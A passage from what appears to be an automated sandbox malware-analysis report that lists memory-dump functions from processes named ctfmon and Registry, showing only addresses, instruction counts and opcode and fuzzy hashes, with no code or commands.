                  Function 00007FF848F205D0 Relevance: .2, Instructions: 233COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c41a17b8276c09e8defa12c9e30e4e3849a131bc7eb35bf83dc7a25cb913d0b1
                  • Instruction ID: b3fedea4e7ae22a0c77a33e111f74da91d30a30f83610f36e396c989bba1cd47
                  • Opcode Fuzzy Hash: c41a17b8276c09e8defa12c9e30e4e3849a131bc7eb35bf83dc7a25cb913d0b1
                  • Instruction Fuzzy Hash: DA61C031A0CA4A8FDB48EF5898556BA77E1FF98354F10467ED409C32C1CF35A842C789
                  Function 00007FF848F22AE0 Relevance: .2, Instructions: 220COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f8bfc40892f99e4eb53f69b9e54848ede188596309c93a099f3d0e135acbd122
                  • Instruction ID: 2ade9b2b5a44d41f2da294129dcddbc0c3988314f955724b72000ad7cbbefa2c
                  • Opcode Fuzzy Hash: f8bfc40892f99e4eb53f69b9e54848ede188596309c93a099f3d0e135acbd122
                  • Instruction Fuzzy Hash: BE717B3090DA8A8FEB85EB2888686F97BE0FF19350F1404BBD409D71D2EB78A584C755
                  Function 00007FF848F2AD1D Relevance: .2, Instructions: 218COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 468a40a4484618b1aec81817d1999b5e64a0486b08d8448c9896fbed82694589
                  • Instruction ID: c343764ee62ff63edc33c38c5bb6bccb8fdea7c38e7efb1931bc820beb60396c
                  • Opcode Fuzzy Hash: 468a40a4484618b1aec81817d1999b5e64a0486b08d8448c9896fbed82694589
                  • Instruction Fuzzy Hash: 2C71793090D68E8FEB99EF2488592BE7BE1FF59340F0405BBD809D7192DB38A584C745
                  Function 00007FF848F22A80 Relevance: .2, Instructions: 203COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6499376df9f46bbcdbbee9065e67e4729a64f674ac57516ccf6fd1ebebc64302
                  • Instruction ID: 6fee5bd3387a78a13b3631547e39cff2644c432c0ee202f805d37530f131c1c7
                  • Opcode Fuzzy Hash: 6499376df9f46bbcdbbee9065e67e4729a64f674ac57516ccf6fd1ebebc64302
                  • Instruction Fuzzy Hash: 2C61D63180E78A9FE795BB3898652FA7FB0EF06364F0405BBD448C60D3EF6865488759
                  Function 00007FF848F22EB9 Relevance: .2, Instructions: 175COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 078431d215c68350dd95181f6d2adb3e66b7282037278609c85be41a75c06e72
                  • Instruction ID: 76bc4715ae8442547be5b04a03aead4a315cc8b110765aa4533f0e55e0f35d59
                  • Opcode Fuzzy Hash: 078431d215c68350dd95181f6d2adb3e66b7282037278609c85be41a75c06e72
                  • Instruction Fuzzy Hash: 3651C470D0D68A8FE751EBB498192FABBF0FF16350F0409BAD408D60D2EB79A544C756
                  Function 00007FF848F20500 Relevance: .2, Instructions: 170COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 582e62edbc87a83b8462e2e80a99edad7bb9328984332bf2eb65c382a59dbe75
                  • Instruction ID: 54e2125065c24bd79e7fb31d1eea52e157e099593bc44532265803a16d278735
                  • Opcode Fuzzy Hash: 582e62edbc87a83b8462e2e80a99edad7bb9328984332bf2eb65c382a59dbe75
                  • Instruction Fuzzy Hash: A5518A3090D68E8FEB56EB7498586B9BBE0FF19341F1548BBD809C60E2EB39E544C711
                  Function 00007FF848F23170 Relevance: .2, Instructions: 164COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1c49f77ea4e576985f290ab15702f8ca422d5f24e18b1e94f85babc81e56f71f
                  • Instruction ID: c1a275a745f442fcad61dddef2651703caff079a4d1a76063f4ee243dfd26467
                  • Opcode Fuzzy Hash: 1c49f77ea4e576985f290ab15702f8ca422d5f24e18b1e94f85babc81e56f71f
                  • Instruction Fuzzy Hash: BA51BD70C1D74E8FE752EB78A8592FA7BA0FF15340F4405BAD408C61E2EB3AA548C716
                  Function 00007FF848F2273D Relevance: .1, Instructions: 145COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c0f1de5d4e7891736d4ccbee648ac0338e546a040d37f1c4719d7b29645a90b4
                  • Instruction ID: bd093696bf23d01e0a2b39237fd0d051b0807ae558b27ee738046cbbcadc413d
                  • Opcode Fuzzy Hash: c0f1de5d4e7891736d4ccbee648ac0338e546a040d37f1c4719d7b29645a90b4
                  • Instruction Fuzzy Hash: 0B418F3080D78A8FEB56AF7498582A97FA0FF16341F0548BBD848C60D2EB39A558C712
                  Function 00007FF848F231E0 Relevance: .1, Instructions: 131COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cd5de4198acad57d069c072ec66f636faad629fe570e8cccabd7300ba68f6df2
                  • Instruction ID: 1e5664134d5b448d8a34bc750cec6dc7bc4bea6e2b90e81b244128e85589b9e8
                  • Opcode Fuzzy Hash: cd5de4198acad57d069c072ec66f636faad629fe570e8cccabd7300ba68f6df2
                  • Instruction Fuzzy Hash: 0941CDB0C1E64E8FE751EB68E8592FD7BB0EF15340F44057AD409D21E2EB3AA548C716
                  Function 00007FF848F2AEFA Relevance: .1, Instructions: 119COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2e5794bed75f8c2cd5d27c4a1f25cf5acc7c7cc32bf6eed5f83b9722ed32dcc3
                  • Instruction ID: 6e8157f73e99b1700d09a9eb01ef8fc2ba6129049c64bb281bb4c9e93ef3ca5e
                  • Opcode Fuzzy Hash: 2e5794bed75f8c2cd5d27c4a1f25cf5acc7c7cc32bf6eed5f83b9722ed32dcc3
                  • Instruction Fuzzy Hash: FA312671D0DA9A8FE351EB78A8580E97BE0FF15350F0805BBC008C70D2EF2E54868355
                  Function 00007FF848F2290D Relevance: .1, Instructions: 111COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b69824976fdd3e5d9189a9d7b3823dd878462892a0e3dbdc76b6f568648abaaf
                  • Instruction ID: 36c6ac72103e7281a2fc486ab5fdd7610c707d22c94afa0a4ce16e629eaa539b
                  • Opcode Fuzzy Hash: b69824976fdd3e5d9189a9d7b3823dd878462892a0e3dbdc76b6f568648abaaf
                  • Instruction Fuzzy Hash: 49310832A0D2958FD741BB78E8946E97BB0FF42365F0946B3C148CA093DB3C9049C395
                  Function 00007FF848F204F8 Relevance: .1, Instructions: 95COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cf18c6c76cccf32e35b1b8d738c782ba9d41d3f7807142d3fc267cce3daabddb
                  • Instruction ID: f4120e4b470ff9ebe74ccaa2a73021554ed122600864347dfa08479c79e3804e
                  • Opcode Fuzzy Hash: cf18c6c76cccf32e35b1b8d738c782ba9d41d3f7807142d3fc267cce3daabddb
                  • Instruction Fuzzy Hash: 7131703081D78E8FEB5AAF7498182F97BA0FF15341F5408BBE809C61D2EB39A558C751
                  Function 00007FF848F22FB8 Relevance: .1, Instructions: 94COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 23d4a2af80d39bf8b3c553b8ef767c0d88bc383bcfd9f4b41bbb190525e1036b
                  • Instruction ID: 3ede0bc2ead8d65cf8e209099d7309e1780d0de0a9eeeb12b92e337915efcce9
                  • Opcode Fuzzy Hash: 23d4a2af80d39bf8b3c553b8ef767c0d88bc383bcfd9f4b41bbb190525e1036b
                  • Instruction Fuzzy Hash: DD319270D0D24E8EEB11EBA898043FEBBE0EF15355F040875D404E61D2DB7AA548CB6A
                  Function 00007FF848F2B1ED Relevance: .1, Instructions: 88COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2ab02f3f283bb0402bc94bd82e308650fad6029c6b804035ec286fb02a544112
                  • Instruction ID: c1535c7b1c7c206a4983130478edb52f8fb8febf945c32a1f69e328e815946aa
                  • Opcode Fuzzy Hash: 2ab02f3f283bb0402bc94bd82e308650fad6029c6b804035ec286fb02a544112
                  • Instruction Fuzzy Hash: 55311670D1852A8FEB94EF94D8847ECB6F1FF48340F9046BAD40DE2291DB7969848F58
                  Function 00007FF848F22838 Relevance: .1, Instructions: 63COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 16f30f5b6ad1de2e517472e70e3ddad807002b39e2d53b74ec17606d119adcc8
                  • Instruction ID: 5dcd5be4681809920734f988b210f820d26c954a9193d80ae4c0218544399642
                  • Opcode Fuzzy Hash: 16f30f5b6ad1de2e517472e70e3ddad807002b39e2d53b74ec17606d119adcc8
                  • Instruction Fuzzy Hash: 4F118E3085E78E8FEB59AB7494182F97BA0FF55341F5008BBE809C20D6DB39A558C741
                  Function 00007FF848F20608 Relevance: .1, Instructions: 60COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cf07d2e8ed3331ae8bbef3e1d1da0ddf7be21d4825086070c372800fba5d49ec
                  • Instruction ID: 5281548a6eec17bd8a1dee717fe4f69874e5c59b75348e8e42effcc0aa548153
                  • Opcode Fuzzy Hash: cf07d2e8ed3331ae8bbef3e1d1da0ddf7be21d4825086070c372800fba5d49ec
                  • Instruction Fuzzy Hash: AA118F3085D78E9FEB59AB7494082FAB7A4FF05345F50087BE819C10D2DF39A558C741
                  Function 00007FF848F205D8 Relevance: .1, Instructions: 60COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: aeaa2ea614b0ad83b59993dff2c4c8a784d360ec07a3b58bdc11128b79fd2624
                  • Instruction ID: bbfdf8df7213eea08bb3c2722d01ff6d9af197d53fb2f77c7f346c3468f71c11
                  • Opcode Fuzzy Hash: aeaa2ea614b0ad83b59993dff2c4c8a784d360ec07a3b58bdc11128b79fd2624
                  • Instruction Fuzzy Hash: 9511BC3084DA4D8FDB49EF6494596B97BA1FF59340F9045BED409C30D2DB36B486C748
                  Function 00007FF848F20610 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 60c9ccd575721fe7ce1a04f1233960a6968d81f072c35c875216c52d5b5fc447
                  • Instruction ID: 645c4bbed140f294b15af464c919a3e599884c18fd8ca4dd426c42b5691e8e98
                  • Opcode Fuzzy Hash: 60c9ccd575721fe7ce1a04f1233960a6968d81f072c35c875216c52d5b5fc447
                  • Instruction Fuzzy Hash: 39016930819A0E9EEB49EBB494586F9B7A0FF18345F60087FE81EC21D5DF36A594C714
                  Function 00007FF848F20F9A Relevance: .0, Instructions: 23COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6eb8a18bdaddba3ea0c11ba2d346a791cc7251c7be11ce4be587e0aeab8284eb
                  • Instruction ID: 70fbe0b85560b5d9cbc7f70966701ef1c08c9be0c3c5ae1ae583ea9d4ab2e6bf
                  • Opcode Fuzzy Hash: 6eb8a18bdaddba3ea0c11ba2d346a791cc7251c7be11ce4be587e0aeab8284eb
                  • Instruction Fuzzy Hash: C2F03030A094198FEB50EB58D980BEE77F1EB94345F104265C409E3285CF3AAE848F88
                  Function 00007FF848F286C8 Relevance: .0, Instructions: 21COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 48c82dc0f57b45cf7d3db02653334bf833c922603533d2ae3462411b959b7ccd
                  • Instruction ID: bebe179727837605b8858fdd165e8be2353e30b1bf0d680e933d662a0be8a0b6
                  • Opcode Fuzzy Hash: 48c82dc0f57b45cf7d3db02653334bf833c922603533d2ae3462411b959b7ccd
                  • Instruction Fuzzy Hash: 97E0C9B0D1C91ECEDBA4EB049940BA8B6B1BF54344F2040F9820DE21D0DB392AC18F08
                  Function 00007FF848F27497 Relevance: .0, Instructions: 15COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 19e52234b08fe96b60c110f043f71cc798f7e3e331db9339d78190f26c2a6093
                  • Instruction ID: 9e68356b72711295f76f4b4a92f364bf6f4393a4e4aca72441659c55d787ff4a
                  • Opcode Fuzzy Hash: 19e52234b08fe96b60c110f043f71cc798f7e3e331db9339d78190f26c2a6093
                  • Instruction Fuzzy Hash: 59E04CB0D1C91D8EDBA4EB049850BA8B7B1FF54354F1045F9820DE3280DB356AC19F08

                  Executed Functions

                  Function 00007FF848F03645 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID: Z_H
                  • API String ID: 0-256909865
                  • Opcode ID: 885635410e46377ce21d007dda7c9ab63d69c1d72bd42830d9086ad3d9d043b6
                  • Instruction ID: d3e9f89deb728e1078b05ca16dbd5bd698c9fa779b950acf7d654d51bbc65d45
                  • Opcode Fuzzy Hash: 885635410e46377ce21d007dda7c9ab63d69c1d72bd42830d9086ad3d9d043b6
                  • Instruction Fuzzy Hash: EA91BD71D1D94A9FEB48EB2CD8697A9BFE1FB8A350F5040BAC009C72C6DB781845CB51
                  Function 00007FF848F142E0 Relevance: .9, Instructions: 877COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 49eaa3b9891decd1b378f43e18f7463df82f2550f09730c24ec862119f2cfb26
                  • Instruction ID: 07bd2c44628d8d14ca2d3bb28e9ed0ddd9b7207b6f382a4166c7c78906552ebe
                  • Opcode Fuzzy Hash: 49eaa3b9891decd1b378f43e18f7463df82f2550f09730c24ec862119f2cfb26
                  • Instruction Fuzzy Hash: 6B62A030C0E68A9FEB56EF3488292F97FE1FF66351F0505BAD808C61D2DB286944C756
                  Function 00007FF848F13768 Relevance: .8, Instructions: 848COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e2b90f5283254efedb42b79099098530d19e718cfdd4826e992814b59cefdc25
                  • Instruction ID: e683740081dfa48e1259b8ba84266c6ed5301eac7ab0367e9c6185c982d8e206
                  • Opcode Fuzzy Hash: e2b90f5283254efedb42b79099098530d19e718cfdd4826e992814b59cefdc25
                  • Instruction Fuzzy Hash: 9152DF30D0D68A8FEB89EF2888692B97BE1FF69341F0505BAD409C71D2DB38A944C755
                  Function 00007FF848F14448 Relevance: .7, Instructions: 730COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b79c49fb281db7dc1042eea72d4294b603681f662dc4256456c8bc9622e70501
                  • Instruction ID: 3396320c39ac9f875e8e94ba2c24d51164efac15606470db526c18ff8dbb36fc
                  • Opcode Fuzzy Hash: b79c49fb281db7dc1042eea72d4294b603681f662dc4256456c8bc9622e70501
                  • Instruction Fuzzy Hash: 8B429230C0E68A9FEB99EF3488292F97BE1FF65351F0505BAD808C61D2DB386944C756
                  Function 00007FF848F14D6D Relevance: .6, Instructions: 594COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fe147201f49585378424ac92934fc0b8236c0ea3801128fb692b590d87de4e03
                  • Instruction ID: 8c877d5657f23cb59e04e649e5e139d6a41a8aa48f583e3ef50f61756be808a9
                  • Opcode Fuzzy Hash: fe147201f49585378424ac92934fc0b8236c0ea3801128fb692b590d87de4e03
                  • Instruction Fuzzy Hash: 4522BD3080D68E9FEB95EF2488696BABBF1FF59341F0404BAD409C71D2EB38A944C755
                  Function 00007FF848F15E21 Relevance: .4, Instructions: 447COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: caf60c0d5bf83483fd53e7ad2a0818e1f9b9a7c8ce9324881114899b96a08699
                  • Instruction ID: c28fd2085a53c8ba832d6d5025e04963c53c763a925026c7eda247e2d32a3dbf
                  • Opcode Fuzzy Hash: caf60c0d5bf83483fd53e7ad2a0818e1f9b9a7c8ce9324881114899b96a08699
                  • Instruction Fuzzy Hash: 22E18D30D0D68E8FEB99EB2488596BABBB1FF19341F0445BAD409C71D2DF386984CB45
                  Function 00007FF848F12290 Relevance: .4, Instructions: 390COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d9b65cc19ec64d2c45580e90b54bbd4688608e11a252489078ed597573d6a63d
                  • Instruction ID: d0593563b627b8c0e3bb7330b0502531b21d965956b7020a57e95b1f22aa5722
                  • Opcode Fuzzy Hash: d9b65cc19ec64d2c45580e90b54bbd4688608e11a252489078ed597573d6a63d
                  • Instruction Fuzzy Hash: B1D1893090D68A8FEB45EFA488A96F97BE0FF19340F0545BAE409C71D2DB38A944CB55
                  Function 00007FF848F16D28 Relevance: .3, Instructions: 288COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b6057708656048780fef3adb545bd94f511b7326fdf61f7ce3edc0c40cc4507f
                  • Instruction ID: e7fc4daa8c636fcfcb5c8f0945f9d9b666986e7ccbaf3d2b9903c01008bd0ea4
                  • Opcode Fuzzy Hash: b6057708656048780fef3adb545bd94f511b7326fdf61f7ce3edc0c40cc4507f
                  • Instruction Fuzzy Hash: 8DA1C03080D68A9FEB9AEF28C8692B97BB0FF5A341F0501BED409C71D2DB396944C755
                  Function 00007FF848F0C8FB Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID: {O_^
                  • API String ID: 0-1464602388
                  • Opcode ID: ac7d124b86a859a3893b388e52ea006a86e6446cb3c31df61f45c200ed2344ff
                  • Instruction ID: b6b17153a1a6add77c5f5f343dd1830e718e75084305508b0aecd3a04521d99a
                  • Opcode Fuzzy Hash: ac7d124b86a859a3893b388e52ea006a86e6446cb3c31df61f45c200ed2344ff
                  • Instruction Fuzzy Hash: 9241B03690E25ADEE755BBACA8551FA7B60EF527B9F040237D50CC90C3FB2C244582A9
                  Function 00007FF848F145F8 Relevance: .6, Instructions: 599COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b09bc1349d58ff6513e62e489098b0c1c4dd845d4d7dc512269d0defa0f8a2f3
                  • Instruction ID: b0dd5f9c06c0f273957cf239e9c711ef10941bd4750a052e2c8516037e154b4a
                  • Opcode Fuzzy Hash: b09bc1349d58ff6513e62e489098b0c1c4dd845d4d7dc512269d0defa0f8a2f3
                  • Instruction Fuzzy Hash: F2129330C0E68A9FEB99EF3488192F97BE1FF65351F0505BAD808C61D2EB386944C756
                  Function 00007FF848F13219 Relevance: .6, Instructions: 585COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e1d8bafe8f14c19a2c084a72d25d56e23b9313f3e98aa4d5f287f3f4cb270f7a
                  • Instruction ID: 5d8b83d1fb6a203df0b2fb853052141c69a5d3c3cba62f566b7a47b2ce4bcbba
                  • Opcode Fuzzy Hash: e1d8bafe8f14c19a2c084a72d25d56e23b9313f3e98aa4d5f287f3f4cb270f7a
                  • Instruction Fuzzy Hash: 8E61807180E6C59FE752A77888595A9BFF0FF16351F0904FBC088CB0D3DA28A948C366
                  Function 00007FF848F14698 Relevance: .6, Instructions: 550COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 58ec6f227e552bc04c55f87c7f7f7765f94e94b59d9cf8dea303a907416aaae8
                  • Instruction ID: c16ab514a503a59b6550979de968fdd6f89f87a8bfcacb86ea67bc0d0e5b3b02
                  • Opcode Fuzzy Hash: 58ec6f227e552bc04c55f87c7f7f7765f94e94b59d9cf8dea303a907416aaae8
                  • Instruction Fuzzy Hash: BC12A330C0E68E9FEB99EF3488192F97BE1FF65351F0505BAD408C61D2EB286944C756
                  Function 00007FF848F13790 Relevance: .5, Instructions: 547COMMON
                  Download Yara Rule
                  Memory Dump Source
